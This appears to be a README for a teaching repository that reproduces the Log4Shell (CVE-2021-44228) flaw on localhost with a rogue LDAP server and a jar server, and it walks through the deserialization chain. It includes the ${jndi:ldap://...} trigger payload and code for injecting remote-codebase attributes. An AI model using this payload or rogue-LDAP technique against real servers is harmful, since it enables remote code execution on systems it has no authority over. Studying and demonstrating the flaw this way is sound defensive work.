# Exploring the Log4j2 JNDI Vulnerability

In late November 2021 a Remote Code Execution (RCE) vulnerability
within Log4j2 framework became publicly known and was classified as
[CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228).
This vulnerability was given the following description:

> Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 
> 2.12.3, and 2.3.1) JNDI features used in configuration, 
> log messages, and parameters do not protect against attacker controlled LDAP 
> and other JNDI related endpoints. An attacker who can control log messages 
> or log message parameters can execute arbitrary code loaded from LDAP servers 
> when message lookup substitution is enabled. From log4j 2.15.0, 
> this behavior has been disabled by default. From version 2.16.0 
> (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. 
> Note that this vulnerability is specific to log4j-core and does not affect log4net, 
> log4cxx, or other Apache Logging Services projects.

One way to exploit the vulnerability is to cause a log message to be
written that exercises the [Log4j2's string substitution functionality](https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution).
This functionality allows variables enclosed by "${" and "}" to be replaced 
by a
calculated value, such as the value of an object that has been downloaded 
from an LDAP server.
Users/hackers are in control of the content of requests, so 
they can populate substitutable values such that when Log4j2 logs that part 
of the request, the values are then 
substituted and during this 
process the hacker will be able to have their own Java code downloaded and 
executed.

## Reproducing the Log4j2 JNDI Vulnerability

This repository contains code to allow Java developers to recreate this 
vulnerabilty locally by running an HTTP server, an LDAP server and a server 
from which the hacker's code can be downloaded.

The necessary code is organised within a multi-module maven project with 4 modules:
- hacker-code : contains the java code that the hacker wishes to run on a
  vulnerable server. In this example the code spawns a new Thread which will
  run until the parent Java process is terminated. When this project is
  installed the jar is copied to the target/class directory of the
  jar-server as well as the local maven repository.
- jar-server : this is a very simple HttpServer that returns the hacker-code
  jar in response to any request.
- ldap-server : this server is an instance of [Apache Directory](https://directory.apache.org/apacheds/). It will create an instance of a 
  class from the hacker-code jar and return it to the vulnerable-server.
- vulnerable-server : this is an instance of an HttpServer which uses Log4j2
  to log the path of the request.

In order to replicate the vulnerability you need to have git and JDK8+
installed. The commands below will build the hackers code, wrap it in a 
jar, and then start the 3 necessary servers: the jar-server, 
the ldap-server and the vulnerable-webapp server.

```
git clone https://github.com/ptma549/log4jshell-example
cd log4jshell-example
./mvnw -f hacker-code
./mvnw -f jar-server &
./mvnw -f ldap-server &
./mvnw -f vulnerable-webapp &
```

To get the hacker's class to be executed on the vulnerable server point your
browser to
> http://localhost:8080/${jndi:ldap://localhost:7389/dc=myorg,dc=com}

This request results in the following interactions between the components, 
as shown in the diagram below.

___

```plantuml
autoactivate on
autonumber

participant http_client as "http_client"
participant ldap_server as "ldap_server\n:7839"
participant jar_server as "jar_server\n:9090"
participant vulnerable_server as "vulnerable_server\n:8080"
participant HackersCode

http_client -> vulnerable_server : http://localhost:8080/${jndi:ldap://localhost:7389/dc=myorg,dc=com}
vulnerable_server -> ldap_server : ldap://localhost:7389/dc=myorg,dc=com
note right of ldap_server
javaclassname = 'hacker.HackersCode'
javacodebase = 'http://localhost:9090/hacker-code.jar'
javaserializeddata = byte[] - serialization of java object
end note
ldap_server --> vulnerable_server :
vulnerable_server -> jar_server : http://localhost:9090/hacker-code.jar
note right of jar_server
jar contains class 'hacker.HackersCode'
end note
jar_server --> vulnerable_server :
vulnerable_server -> HackersCode  : readResolve()
note left of HackersCode
Hackers code starts new Thread
and continues to run
end note
vulnerable_server --> http_client : 

```
___

## Maven Modules
The repository's 4 modules are as follows.

### hacker-code
This simple module contains a class that the hacker wishes to run on 
the vulnerable server. In this example the class is called `hacker.HackersCode`. 
When this module is built (./mvnw install) it will not only be installed 
into the local maven repo but also copied to the directory:  
> jar-server/target/classes

from where the jar-server can send it in a response to the vulnerable-server.

### jar-server
This module is a simple HttpServer. When the server receives a request (no 
matter what the request contains) it will always set the response headers to 
> Content-Type : application/java-archive

and stream back the contents of the `hacker-code` jar that was copied to the 
directory
> jar-server/target/classes


### ldap-server
This module is an instance of [Apache Directory](https://directory.apache.org/apacheds/).
It has a very basic configuration as defined in 
`ldap-server/src/main/resources/users.ldif`. In response to a request such as 
`jndi:ldap://localhost:7389/dc=myorg,dc=com` ApacheDS would normally respond 
with an LdapResult containing an LdapEntry as shown in the figure below. 

![Standard LdapResult](docs/LdapResult.png)

This response would never result in the hacker's code being executed. This 
requires 3 additional LDAP attributes to be returned:

1. javaclassname = `'hacker.HackersCode'`
2. javacodebase = `'http://localhost:9090/hacker-code-1.0-SNAPSHOT.jar'`
3. javaserializeddata = `byte[]` - a serialized instance of
   `hacker.HackersCode`

ApacheDS uses the method WriteFuture.write(Object) to return the LdapResult 
to a client, so to augment the LdapResult with the 3 additional attributes I 
have used AspectJ to define the pointcut:
```
    pointcut callInfo(Object message, AbstractIoSession session) :
     call(WriteFuture write(Object)) && args(message) && target(session);
```
and the following advice will be actioned at that join point:
```
        if (SearchResultEntryImpl.class.equals(messageIn.getClass())) {
            SearchResultEntryImpl message = (SearchResultEntryImpl) messageIn;
            message.getEntry().add(JAVACLASSNAME, HackersCode.class.getName());
            message.getEntry().add(JAVA_CODE_BASE, HackersJarServer.URL.value);
            message.getEntry().add(JAVA_SERIALIZED_DATA, hackersCode.toByteArray());
        }
```

This will result in the following LdapResult being returned to the 
vulnerable-webapp.

![Augmented LdapResult](docs/LdapResult-augmented.png)

NB CreateLdapServer.allowAnonymousAccess must be set to true because the
Log4j will make an authentication call before the lookup call.

### vulnerable-webapp

This module is a very simple HttpServer that will use Log4j2 to log the 
request's path and then return the contents of the file 
> vulnerable-webapp/src/main/resources/index.html
 
It is the logging of the request's path that makes the server vulnerable 
when the path contains a string that has the form:
```
 ${jndi:ldap://<ldap-server>/dc=myorg,dc=com}
```

When Log4j2 attempts to print this message it results in the following 
stacktrace:

![Log4j2 LDAP Stacktrace](docs/info-deserializeObject.png)

The Log4j2 logger calls 
> MessagePatternConverter.format(final LogEvent event, final StringBuilder toAppendTo) 
 
which searches for the pattern `'${'` and when it finds it calls the 
StrSubstitutor.replace(...) method, which calls Interpolator.lookup(...). 
The Interpolator.lookup method tries to find an instance of StrLookup that 
corresponds to the prefix "jndi". 
The following prefixes are supported: date, ctx, lower, upper, main, env, sys, sd, java, marker, jndi, jvmrunargs, event, bundle, map, log4j.

The JndiLookup object then creates an javax.naming.InitialContext object 
wrapped within a JndiManager object and uses that to call 
the LDAP server as shown below:

![Create JndiManager](docs/jndi-manager.png "JNDI Manager Creation & Lookup")

The LDAP server replies with the augmented LdapResult: 

![Augmented LdapResult](docs/LdapResult-augmented.png "LdapResult")

which contains the 3 crucial LdapAttributes:  

- `javaclassname` = `'hacker.HackersCode'`
- `javacodebase` = `'http://localhost:9090/hacker-code-1.0-SNAPSHOT.jar'`
- `javaserializeddata` = `byte[] - a serialization of java object`

The value of the javaclassname doesn't matter, as long as it is non-null.
Only when it is non-null will the server attempt to deserialize the javaserializeddata's byte[] 
within the LdapResult.

To do this it takes the `javacodebase` and `javaserializeddata` attributes 
from the LdapResult and, as can be seen in the code snippet below, attempts to 
deserialize the Java object bytes in `javaserializeddata` using the Java 
class definition that is available from the jar at the `javacodebase` URL. 
The snippet below is taken from com.sun.jndi.ldap.Obj.decodeObject

![deserialize object](docs/decodeObject.png)

- JAVA_ATTRIBUTES[1] : "javaSerializedData"
- JAVA_ATTRIBUTES[4] : "javaCodeBase"

During this deserialization process, the hacker has the opportunity to execute 
code within the vulnerable-server's process by defining on the HackersCode 
class either:
- a static initializer, or 
- the method 
  [`Object readResolve() throws ObjectStreamException`](https://docs.oracle.com/javase/7/docs/platform/serialization/spec/input.html#5903)  

The readResolve() method has the advantage that it will be able to access 
instance variables set within the deserialized object.

Using either of these methods, a new `java.lang.Thread` can be spawned. In this 
example a new Thread is created that outputs a log entry every 3 seconds.

NB for this vulnerability to work the system property
`com.sun.jndi.ldap.object.trustURLCodebase`
must be `true`. The class VulnerableServer forces this value to `true` when 
the server starts. 


### Http Client
The easiest way to initiate the attack is to point your browser to the
vulnerable webapp's endpoint with a path that Log4j2 will attempt to
substitute when it logs the path, such as :
[http://localhost:8080/${jndi:ldap://localhost:7389/dc=myorg,dc=com}](http://localhost:8080/${jndi:ldap://localhost:7389/dc=myorg,dc=com})

